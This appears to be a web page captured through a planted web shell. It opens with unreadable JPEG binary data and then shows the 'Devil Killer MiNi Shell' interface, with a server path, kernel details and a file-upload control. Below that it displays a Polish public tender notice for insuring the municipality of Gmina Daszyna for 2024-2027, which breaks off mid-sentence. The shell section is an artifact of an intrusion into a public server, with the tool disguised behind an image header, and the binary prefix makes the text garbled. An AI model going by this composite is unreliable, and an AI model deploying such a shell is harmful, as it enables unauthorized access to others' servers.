JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231115/0049518901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ubezpieczenie Gminy Daszyna na lata 2024-2027 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA DASZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 611015885</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">34A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Daszyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-107</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24-357-10-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gminadaszyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.daszyna.4bip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">HM Consulting Sp. z o.o</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">725-205-51-80</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Gdańska 126/128</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">90-520</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">90-520</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">biuro@hm-c.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">http://hm-c.pl/kontakt/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ubezpieczenie Gminy Daszyna na lata 2024-2027 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f395fdfa-82ec-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00495189</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00092770/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ubezpieczenie Gminy Daszyna na lata 2024- 2027</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> 5.1. Zamawiający określa poufny charakter informacji zawartych w następujących Załącznikach do SWZ: <br/>5.1.1 Załącznik nr 1 – Opis przedmiotu zamówienia – Zadanie I i Zadanie II<br/>5.1.2 Załącznik nr 5 – Dane do oceny ryzyka i szkodowość_Zadanie I i Zadanie II<br/>5.2.	Wykonawca może uzyskać dostęp do informacji poufnych poprzez wystąpienie z wnioskiem do Zamawiającego o ich udostępnienie w formie elektronicznej poprzez Platformę e-Zamówienia.<br/>5.3.	We wniosku o udostępnienie informacji poufnych Wykonawca winien wskazać dane dotyczące Wnioskodawcy i Wykonawcy, którego reprezentuje, powołując się na numer postępowania.<br/>5.4.	Wszelkie informacje, zawarte w niniejszej SWZ są przeznaczone wyłącznie do przygotowania oferty i nie powinny być wykorzystywane w innym celu ani udostępniane osobom trzecim, niebiorącym udziału w niniejszym postępowaniu, chyba, że jest to niezbędne i konieczne do przygotowania oferty. Wykonawca zobowiązany jest do zachowania poufności co do treści wszelkich dokumentów i informacji uzyskanych w związku z prowadzeniem niniejszego postępowania, zgodnie z zasadą określoną w art. 35 i nast. ustawy z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (t.j. Dz.U. z 2023 r. poz. 656 ze zm.). <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">7.1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, tj.:<br/>7.1.1.	Pocztą elektroniczną na adres e-mail Zamawiającego sekretariat@gminadaszyna.pl oraz adresy e-mail Wykonawców podane w formularzach ofertowych. Po otwarciu ofert kontakt przez adres e-mail będzie możliwy tylko poprzez adres (adresy) wskazany w formularzu ofertowym lub<br/>7.1.2.	poprzez Platformę e-Zamówienia (zwana dalej „Platformą”) https://ezamowienia.gov.pl z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu Platformy</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">4.1.	Informacje na temat komunikacji za pośrednictwem Platformy dostępne są również w Instrukcji interaktywnej – „Komunikacja w postępowaniu” dostępnej pod adresem: https://ezamowienia.gov.pl/pl/komponent-edukacyjny/</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">29.1.	W związku z przetwarzaniem danych osobowych osób fizycznych składających w imieniu wykonawcy ofertę, pełnomocników, osób reprezentujących wykonawcę oraz osób prowadzących postępowanie o udzielenie zamówienia publicznego, realizując obowiązek o którym mowa w art. 13 RODO informujemy:<br/>29.1.1.	Administratorem Danych Osobowych jest Wójt Gminy Daszyna – Zbigniew Wojtera <br/>29.1.2.	Inspektorem Ochrony Danych Osobowych jest: Ewelina Witosławska <br/>29.1.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c Rodo w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>29.1.4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych oraz broker Zamawiającego przygotowujący i przeprowadzający postępowanie <br/>29.1.5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>29.1.6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>29.1.7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, dane nie będą przekazywane do państwa trzeciego.<br/>29.1.8.	Posiada Pan/Pani prawo dostępu do danych osobowych, sprostowania danych, żądania ograniczenia przetwarzania danych, wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych; <br/>29.1.9.	Nie przysługuje Panu/Pani w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych, prawo do przenoszenia danych osobowych, prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPI.271.8.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa: „Ubezpieczenie Gminy Daszyna na lata 2024-2027”, nazywana w dalszej treści niniejszej SWZ „przedmiotem zamówienia”.<br/>4.2.	Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <p class="mb-0">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66516100-1 - Usługi ubezpieczenia pojazdów mechanicznych od odpowiedzialności cywilnej</p> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.1.	Ocenie i porównaniu zostaną poddane oferty niepodlegające odrzuceniu.<br/>21.2.	W związku z określeniem przez Zamawiającego standardów jakościowych, odnoszących się do wszystkich istotnych cech przedmiotu zamówienia, takich jak: przedmiot zamówienia, zakres ubezpieczenia, system ustalenia sum ubezpieczenia, system wypłaty odszkodowań, poziom franszyz i udziałów własnych, jednolita treść klauzul dodatkowych z określeniem limitów odpowiedzialności – zastosowanie będą miały postanowienia art. 246 ust. 2 Ustawy Pzp.<br/>21.3.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie kryterium:<br/>1)	„Cena” <br/>2)	„Preferowane warunki ubezpieczenia”<br/>21.4.	Kryterium „cena” przyznaje się wagę 90% (1% odpowiada 1 punktowi).<br/>21.5.	Kryterium „preferowane warunki ubezpieczenia” przyznaje się wagę 10% (1% odpowiada <br/>1 punktowi).<br/>21.6.	Zamawiający uzna za najkorzystniejszą ofertę tę, która uzyska najwyższą łączną liczbę punktów w kryterium „Cena” i „Preferowane warunki ubezpieczenia”.<br/><br/>22.	SPOSÓB OBLICZENIA CENY OFERTY I DOKONANIA OCENY OFERT <br/>22.1.	Kryterium „CENA”:<br/>22.1.1.	Wykonawca, określając cenę oferty, uwzględnia w niej wszystkie koszty wykonania zamówienia.<br/>22.1.2.	Cena oferty to łączna suma składek ubezpieczeniowych (brutto) za okres obowiązywania umowy na wykonanie niniejszego zamówienia, obliczona zgodnie z Załącznikiem 3a – Formularz cenowy dla Zadania I<br/>22.1.3.	Cena oferty zostanie wyliczona przez Wykonawcę w oparciu o informacje zawarte <br/>w niniejszej SWZ.<br/>22.1.4.	Wszystkie składniki ceny oferty winny być wyrażone w złotych polskich <br/>i podane w zaokrągleniu do pełnej złotówki.<br/>22.1.5.	Ceny jednostkowe (stopa składki) określone przez Wykonawcę w ofercie nie będą zmieniane w toku realizacji przedmiotu zamówienia z zastrzeżeniem zapisów pkt 27.<br/><br/>22.2.	Kryterium „PREFEROWANE WARUNKI UBEZPIECZENIA”<br/>22.2.1.	Przez preferowane warunki ubezpieczenia rozumiane są klauzule umieszczone <br/>w Opisie przedmiotu zamówienia, opisane jako fakultatywne klauzule punktowane z kolejnym numerem porządkowym. Zaakceptowanie klauzuli fakultatywnej przez Wykonawcę nie stanowi podstawy do żądania zapłaty dodatkowej składki.<br/>22.2.2.	W odniesieniu do każdej klauzuli punktowanej wymagane jest jednoznaczne ustosunkowanie się Wykonawcy, co do przyjęcia klauzuli – oznaczenie słowem TAK lub nie przyjęcia klauzuli – oznaczenie słowem NIE, w zaproponowanej treści (zgodnie z deklaracją przyjęcia/nie przyjęcia klauzul punktowanych – pkt. 6. Formularza oferty – Załącznik nr 2).<br/>22.2.3.	Każda klauzula punktowana otrzymuje liczbę punktów zgodnie z pkt. 22.2.4. Liczba punktów wszystkich klauzul fakultatywnych zostanie zsumowana (maksymalnie 100 punktów). Jeżeli w tabeli będzie wpisane NIE lub jeżeli dane pole zostanie w tabeli puste, Zamawiający uzna, iż Wykonawca nie przyjął klauzuli i do obliczeń przyjmie dla tej pozycji wartość zero.<br/>22.2.4.	Każda klauzula fakultatywna w przypadku przyjęcia, otrzyma odpowiednio wskazaną poniżej liczbę punktów:<br/><br/>Zadanie I<br/>Klauzula punktowana nr 1	35 pkt<br/>Klauzula punktowana nr 2	30 pkt<br/>Klauzula punktowana nr 3	35 pkt<br/>Łącznie 100 pkt<br/><br/>22.3.	Oferty nieodrzucone będą oceniane wg wzoru:<br/>LP = (Cmin : CO x 100 pkt. x 0,90) + (WO x 0,10)<br/>gdzie:<br/>LP – całkowita liczba punktów przyznanych ocenianej ofercie,<br/>Cmin – najniższa cena oferty spośród ofert podlegających ocenie,<br/>CO – cena oferty ocenianej,<br/>WO – łączna liczba punktów za fakultatywne warunki ubezpieczenia przyjęte <br/>przez Wykonawcę w ocenianej ofercie.<br/><br/><br/>22.4.	Punkty w poszczególnych kryteriach będą wyliczane z dokładnością do dwóch miejsc po przecinku.<br/>22.5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta otrzyma największą całkowitą liczbę punktów (LP).<br/>22.6.	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">PREFEROWANE WARUNKI UBEZPIECZENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa: „Ubezpieczenie Gminy Daszyna na lata 2024-2027”, nazywana w dalszej treści niniejszej SWZ „przedmiotem zamówienia”.<br/>4.2.	Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66515000-3 - Usługi ubezpieczenia od uszkodzenia lub utraty</p> <p class="mb-0">66516400-4 - Usługi ubezpieczenia od ogólnej odpowiedzialności cywilnej</p> <p class="mb-0">66516000-0 - Usługi ubezpieczenia od odpowiedzialności cywilnej</p> <p class="mb-0">66512100-3 - Usługi ubezpieczenia od następstw nieszczęśliwych wypadków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-06 do 2027-01-05</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.1.	Ocenie i porównaniu zostaną poddane oferty niepodlegające odrzuceniu.<br/>21.2.	W związku z określeniem przez Zamawiającego standardów jakościowych, odnoszących się do wszystkich istotnych cech przedmiotu zamówienia, takich jak: przedmiot zamówienia, zakres ubezpieczenia, system ustalenia sum ubezpieczenia, system wypłaty odszkodowań, poziom franszyz i udziałów własnych, jednolita treść klauzul dodatkowych z określeniem limitów odpowiedzialności – zastosowanie będą miały postanowienia art. 246 ust. 2 Ustawy Pzp.<br/>21.3.	Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie kryterium:<br/>1)	„Cena” <br/>2)	„Preferowane warunki ubezpieczenia”<br/>21.4.	Kryterium „cena” przyznaje się wagę 90% (1% odpowiada 1 punktowi).<br/>21.5.	Kryterium „preferowane warunki ubezpieczenia” przyznaje się wagę 10% (1% odpowiada <br/>1 punktowi).<br/>21.6.	Zamawiający uzna za najkorzystniejszą ofertę tę, która uzyska najwyższą łączną liczbę punktów w kryterium „Cena” i „Preferowane warunki ubezpieczenia”.<br/><br/>22.	SPOSÓB OBLICZENIA CENY OFERTY I DOKONANIA OCENY OFERT <br/>22.1.	Kryterium „CENA”:<br/>22.1.1.	Wykonawca, określając cenę oferty, uwzględnia w niej wszystkie koszty wykonania zamówienia.<br/>22.1.2.	Cena oferty to łączna suma składek ubezpieczeniowych (brutto) za okres obowiązywania umowy na wykonanie niniejszego zamówienia, obliczona zgodnie z Załącznikiem 3B – Formularz cenowy dla Zadania II.<br/>22.1.3.	Cena oferty zostanie wyliczona przez Wykonawcę w oparciu o informacje zawarte <br/>w niniejszej SWZ.<br/>22.1.4.	Wszystkie składniki ceny oferty winny być wyrażone w złotych polskich <br/>i podane w zaokrągleniu do pełnej złotówki.<br/>22.1.5.	Ceny jednostkowe (stopa składki) określone przez Wykonawcę w ofercie nie będą zmieniane w toku realizacji przedmiotu zamówienia z zastrzeżeniem zapisów pkt 27.<br/><br/>22.2.	Kryterium „PREFEROWANE WARUNKI UBEZPIECZENIA”<br/>22.2.1.	Przez preferowane warunki ubezpieczenia rozumiane są klauzule umieszczone <br/>w Opisie przedmiotu zamówienia, opisane jako fakultatywne klauzule punktowane z kolejnym numerem porządkowym. Zaakceptowanie klauzuli fakultatywnej przez Wykonawcę nie stanowi podstawy do żądania zapłaty dodatkowej składki.<br/>22.2.2.	W odniesieniu do każdej klauzuli punktowanej wymagane jest jednoznaczne ustosunkowanie się Wykonawcy, co do przyjęcia klauzuli – oznaczenie słowem TAK lub nie przyjęcia klauzuli – oznaczenie słowem NIE, w zaproponowanej treści (zgodnie z deklaracją przyjęcia/nie przyjęcia klauzul punktowanych – pkt. 6. Formularza oferty – Załącznik nr 2).<br/>22.2.3.	Każda klauzula punktowana otrzymuje liczbę punktów zgodnie z pkt. 22.2.4. Liczba punktów wszystkich klauzul fakultatywnych zostanie zsumowana (maksymalnie 100 punktów). Jeżeli w tabeli będzie wpisane NIE lub jeżeli dane pole zostanie 